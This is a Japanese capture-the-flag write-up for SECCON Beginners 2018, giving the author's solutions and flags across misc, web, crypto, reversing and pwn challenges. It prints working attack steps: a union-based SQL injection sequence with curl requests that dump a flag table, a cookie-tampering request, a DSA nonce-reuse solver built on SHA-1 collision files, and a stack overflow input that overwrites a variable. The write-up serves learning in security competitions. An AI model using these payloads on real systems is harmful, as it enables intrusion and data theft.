この大会は2018/5/26 13:00(JST)~2018/5/27 13:00(JST)に開催されました。
今回は久々に一人チームで参戦。結果は1222点で844チーム中47位でした。
バイナリ系が弱いことを再確認した大会です。
自分で解けた問題をWriteupとして書いておきます。
[Warmup] plain mail (Misc)
smtp通信の中からメールを取り出し、さらにそこから添付されているZIPファイルを取り出す。
パスワードもあとで送信されていることがわかる。
_you_are_pro_
このパスワードでZIPファイルを展開すると、ファイルにフラグが書かれている。
ctf4b{email_with_encrypted_file}
てけいさんえくすとりーむず (Misc)
$ nc tekeisan-ekusutoriim.chall.beginners.seccon.jp 8690 Welcome to TEKEISAN for Beginners -extreme edition- --------------------------------------------------------------- Please calculate. You need to answered 100 times. e.g. (Stage.1) 4 + 5 = 9 ... (Stage.99) 4 * 4 = 869 [!!] Wrong, see you. --------------------------------------------------------------- (Stage.1) 694 * 888 =
ひらすら計算していけばよい。
import socket def recvuntil(s, tail): data = '' while True: if tail in data: return data data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('tekeisan-ekusutoriim.chall.beginners.seccon.jp', 8690)) data = recvuntil(s, '.\n---------------------------------------------------------------\n') print data for i in range(100): data = recvuntil(s, '\n') formula = recvuntil(s, '= ') ans = str(eval(formula.replace('=', ''))) print data + formula + ans s.sendall(ans + '\n') data = recvuntil(s, '\n') data += recvuntil(s, '\n') print data
100回正解すると、フラグが表示された。
ctf4b{ekusutori-mu>tekeisann>bigina-zu>2018}
Find the messages (Misc)
FTK Imagerでイメージファイルを開くと、message1~3のフォルダがある。
message1のフォルダにはmessage_1_of_3.txtがあり、Base64文字列が書かれている。
Y3RmNGJ7eTB1X3QwdWNoZWQ=
$ echo Y3RmNGJ7eTB1X3QwdWNoZWQ= | base64 -d ctf4b{y0u_t0uched
message2のフォルダにはmessage_2_of_3.pngがあるが、pngだが、ヘッダ8バイトがXXXXXXXXとなっていて、末尾には00がたくさんついている。PNGのヘッダに書き換え、末尾の00をすべて削除すると、画像にフラグの一部が書いてある。
message3のファオルダにはファイルが見当たらないが、ファイル名がpdfであることだけわかる。08447のファイル内にPDFがあるので、切り出すとフラグの一部が書いてある。
結合すると、フラグになる。
ctf4b{y0u_t0uched_a_part_0f_disk_image_for3nsics}
[Warmup] Greeting (Web)
コードを見ると、postパラメータには何も入れずに、Cookieのnameパラメータにadminが設定されていればよいことがわかる。
$ curl -b 'name=admin' http://greeting.chall.beginners.seccon.jp/ <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <title>SECCON Beginners greeting service</title> </head> <body> <h1>こんにちは!adminさん!</h1> <hr> こんにちは管理者さん。 Flagは、 "ctf4b{w3lc0m3_TO_ctf4b_w3b_w0rd!!}"です。 :
ctf4b{w3lc0m3_TO_ctf4b_w3b_w0rd!!}
SECCON Goods (Web)
ソースを見ると、item.phpを介して、DBにアクセスしていることがわかる。union selectによるSQLインジェクションと推定し、順番に情報を取っていく。
$ curl "http://goods.challeginners.seccon.jp/items.php?minstock=10 union select 1,2,3,4 --" $ curl "http://goods.chall.beginners.seccon.jp/items.php?minstock=10 union select 1,2,3,4,5 --" [{"id":"1","name":"2","description":"3","price":"4","stock":"5"}] $ curl "http://goods.chall.beginners.seccon.jp/items.php?minstock=10 union select table_name,1,2,3,4 from information_schema.tables --" [{"id":"CHARACTER_SETS","name":"1","description":"2","price":"3","stock":"4"},{"id":"COLLATIONS","name":"1","description":"2","price":"3","stock":"4"},……, {"id":"flag","name":"1","description":"2","price":"3","stock":"4"},{"id":"items","name":"1","description":"2","price":"3","stock":"4"}]
flagテーブルがあることがわかる。
$ curl "http://goods.chall.beginners.seccon.jp/items.php?minstock=10 union select column_name,1,2,3,4 from information_schema.columns where table_name='flag' --" [{"id":"flag","name":"1","description":"2","price":"3","stock":"4"}]
flagテーブルにはflagカラムがあることがわかる。
$ curl "http://goods.chall.beginners.seccon.jp/items.php?minstock=10 union select flag,1,2,3,4 from flag --" [{"id":"ctf4b{cl4551c4l_5ql_1nj3c710n}","name":"1","description":"2","price":"3","stock":"4"}]
flagテーブルにはflagカラムにflagが入っていた。
ctf4b{cl4551c4l_5ql_1nj3c710n}
[Warmup] Veni, vidi, vici (Crypto)
part1~3の暗号がある。part1は以下の暗号。
Gur svefg cneg bs gur synt vf: pgs4o{a0zber
シーザー暗号。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号。ROT13で復号できた。
The first part of the flag is: ctf4b{n0more
part2は以下の暗号。
Lzw kwugfv hsjl gx lzw xdsy ak: _uDskk!usd_u
これもシーザー暗号。同じく上記のサイトで復号。ROT18で復号できた。
The second part of the flag is: _cLass!cal_c
part3は以下の暗号。
{ʎɥdɐɹɓ0ʇdʎᴚ :sı ɓɐlɟ ǝɥʇ ɟo ʇɹɐd pɹıɥʇ ǝɥ⊥
上下逆にすると、フラグの一部になる。
The third part of the flag is: Rypt0graphy}
すべて結合すると、フラグになる。
ctf4b{n0more_cLass!cal_cRypt0graphy}
Streaming (Crypto)
フラグの先頭がわかっているので、逆算して最初のgを算出する。あとはXORで元に復号すればよい。
A = 37423 B = 61781 C = 34607 pre_flag = 'ctf4b{' def next(seed): seed = (A * seed + B) % C return seed with open('streaming/encrypted', 'rb') as f: data = f.read() xor0 = ord(data[0]) + ord(data[1]) * 256 xor1 = ord(data[2]) + ord(data[3]) * 256 xor2 = ord(data[4]) + ord(data[5]) * 256 x0 = xor0 ^ int(pre_flag[0:2].encode('hex'), 16) x1 = xor1 ^ int(pre_flag[2:4].encode('hex'), 16) x2 = xor2 ^ int(pre_flag[4:6].encode('hex'), 16) assert (A * x0 + B) % C == x1 assert (A * x1 + B) % C == x2 flag = '' g = x0 for i in range(0, len(data), 2): xor_val = ord(data[i]) + ord(data[i+1]) * 256 x = xor_val ^ g flag +=('%x' % x).decode('hex') g = next(g) print flag
ctf4b{lcg-is-easily-predictable}
RSA is Power (Crypto)
n, e, cが与えられている。nをfactordbで素因数分解する。
p = 299681192390656691733849646142066664329 q = 324144336644773773047359441106332937713
あとはそのまま復号すればよい。
N = 97139961312384239075080721131188244842051515305572003521287545456189235939577 E = 65537 C = 77361455127455996572404451221401510145575776233122006907198858022042920987316 p = 299681192390656691733849646142066664329 q = 324144336644773773047359441106332937713 phi = (p - 1) * (q - 1) x = 0 while True: if (phi * x + 1) % E == 0: d = (phi * x + 1) / E break x = x + 1 m = pow(C, d, N) flag = ('%x' % m).decode('hex') print flag
ctf4b{5imple_rs4_1s_3asy_f0r_u}
Well Known (Crypto)
$ nc crypt1.chall.beginners.seccon.jp 31337 p = 16679194083198950687969733986499924699835997894294807759601033231804550956076926394797958147206191858229465423843797136657860397100060653518514490788419250294275491646689139382741390885296209825510705565868543061881083043043446628516620883906294950391487746915826124373185188216150387558662775769805286515637408175762133603376999884676209361588612724070528494953605301744960179010609458234176550274930122827013540894528488276643059847223625821679882670154250268515234794527153017169583443601216000572420740097190510158670349989667726985760572138710696259607237091420821807056064853023532483648815991497848164747218929 q = 88967137731772648680425587173543061937973706623745105800741828685065752059867 g = 2205575219328681268586322263126158959805960545859875072720447872093269479444559630062394304494512448143523042089258619254204423242110599833444688328880935733612320348258085635290937281673030516545903041256327133878336387195428156600554101046621249609008064639306760200339500602176359940601289972850543735490094373239473342539256157264072918742944223085712953032309226874913361238483889448772032982320710296503313274066005155266183857629778883344435324830986829674201862988844232482517447003175462357914024090662173310667023410075095146627467896921016941051525444471914371051245117060842426553215352438575834348924616 Input your data (in hex): aabbccddeeff r = 62645628195244559274546419372547789374311683313901304193197771394466831076496 s = 60381278484527044314928671102330799715626880732615158327909340984580039303092
p, q, gの値が表示される。ECDSAと同様の問題。kはsha1で計算しているので、sha1の衝突データを2つ指定できれば、同じrで異なるsの値が得られる。それができればxの値を計算してフラグが得られる。
https://github.com/sonickun/sha1-colliderのスクリプトを使って、2つのsha1衝突ファイルを作成する。サイズが大きいが多少削っても衝突する。rが同じ値になるよう調整し、最終的には以下のコードでフラグが得られrた。
import socket import hashlib from Crypto.Util.number import * def recvuntil(s, tail): data = '' while True: if tail in data: return data data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('crypt1.chall.beginners.seccon.jp', 31337)) data = recvuntil(s, '\n') print data[:-1] p = int(data.strip().split(' ')[2]) data = recvuntil(s, '\n') print data[:-1] q = int(data.strip().split(' ')[2]) data = recvuntil(s, '\n') print data[:-1] g = int(data.strip().split(' ')[2]) data = recvuntil(s, '\n') print data[:-1] with open('a-collision.pdf', 'rb') as f: shattered1 = f.read() with open('b-collision.pdf', 'rb') as f: shattered2 = f.read() send_shattered1 = shattered1[:-2000] h_send_shattered1 = send_shattered1.encode('hex') print h_send_shattered1 s.sendall(h_send_shattered1 + '\n') data = recvuntil(s, '\n') print data[:-1] r1 = int(data.strip().split(' ')[2]) data = recvuntil(s, '\n') print data[:-1] s1 = int(data.strip().split(' ')[2]) data = recvuntil(s, '\n') print data[:-1] send_shattered2 = shattered2[:-2000] h_send_shattered2 = shattered2[:-2000].encode('hex') print h_send_shattered2 s.sendall(h_send_shattered2 + '\n') data = recvuntil(s, '\n') print data[:-1] r2 = int(data.strip().split(' ')[2]) data = recvuntil(s, '\n') print data[:-1] s2 = int(data.strip().split(' ')[2]) assert r1 == r2 h1 = int(hashlib.sha256(send_shattered1).hexdigest(), 16) h2 = int(hashlib.sha256(send_shattered2).hexdigest(), 16) k = int(((h1 - h2) % q) * inverse(((s1 - s2) % q), q)) x = int((((((s1 * k) % q) - h1) % q) * inverse(r1, q)) % q) print x flag = ('%x' % x).decode('hex') print flag
ctf4b{be_c4reful_w1th_k}
[Warmup] Simple Auth (Reversing)
$ ltrace ./simple_auth __libc_start_main(0x400792, 1, 0x7ffd88601cd8, 0x400830 <unfinished ...> printf("Input Password: ") = 16 __isoc99_scanf(0x4008c5, 0x7ffd88601bc0, 0x7f81381249e0, 1024Input Password: aaa ) = 1 strlen("aaa") = 3 strlen("ctf4b{rev3rsing_p4ssw0rd}\377\377\377") = 28 puts("Umm...Auth failed..."Umm...Auth failed... ) = 21 +++ exited (status 0) +++
ctf4b{rev3rsing_p4ssw0rd}
[Warmup] condition (Pwn)
IDA Freewareで開く。0xdeadbeefと比較している箇所がある。次にgdbで確認する。
: gdb-peda$ n abcdefghijklm [----------------------------------registers-----------------------------------] RAX: 0x7fffffffdc80 ("abcdefghijklm") RBX: 0x0 RCX: 0xfbad2288 RDX: 0x7ffff7dd59f0 --> 0x0 RSI: 0x7ffff7ff900d --> 0xa (b'\n') RDI: 0x7fffffffdc8d --> 0x400850000000 RBP: 0x7fffffffdcb0 --> 0x0 RSP: 0x7fffffffdc80 ("abcdefghijklm") RIP: 0x4007a0 (<main+47>: cmp DWORD PTR [rbp-0x4],0xdeadbeef) R8 : 0x7ffff7ff900e --> 0x0 R9 : 0x0 R10: 0xd (b'\r') R11: 0x246 R12: 0x400660 (<_start>: xor ebp,ebp) R13: 0x7fffffffdd90 --> 0x1 R14: 0x0 R15: 0x0 [-------------------------------------code-------------------------------------] 0x400793 <main+34>: mov rdi,rax 0x400796 <main+37>: mov eax,0x0 0x40079b <main+42>: call 0x400620 <gets@plt> => 0x4007a0 <main+47>: cmp DWORD PTR [rbp-0x4],0xdeadbeef 0x4007a7 <main+54>: jne 0x4007bf <main+78> 0x4007a9 <main+56>: mov edi,0x4008f8 0x4007ae <main+61>: call 0x4005c0 <puts@plt> 0x4007b3 <main+66>: mov edi,0x40091e [------------------------------------stack-------------------------------------] 00:0000| rax rsp 0x7fffffffdc80 ("abcdefghijklm") 01:0008| rdi-5 0x7fffffffdc88 --> 0x6d6c6b6a69 (b'ijklm') 02:0016| 0x7fffffffdc90 --> 0x400850 (<__libc_csu_init>: push r15) 03:0024| 0x7fffffffdc98 --> 0x400660 (<_start>: xor ebp,ebp) 04:0032| 0x7fffffffdca0 --> 0x7fffffffdd90 --> 0x1 05:0040| 0x7fffffffdca8 --> 0x0 06:0048| rbp 0x7fffffffdcb0 --> 0x0 07:0056| 0x7fffffffdcb8 --> 0x7ffff7a32f45 (<__libc_start_main+245>: mov edi,eax) [------------------------------------------------------------------------------] Legend: stack, code, data, heap, rodata, value 0x00000000004007a0 in main ()
入力が xxx(44バイト)+\xef\xbe\xad\xde の場合にフラグが得られるはず。
$ python -c "print 'a'* 44 + '\xef\xbe\xad\xde'" | nc pwn1.chall.beginners.seccon.jp 16268 Please tell me your name...OK! You have permission to get flag!! ctf4b{T4mp3r_4n07h3r_v4r14bl3_w17h_m3m0ry_c0rrup710n}
ctf4b{T4mp3r_4n07h3r_v4r14bl3_w17h_m3m0ry_c0rrup710n}
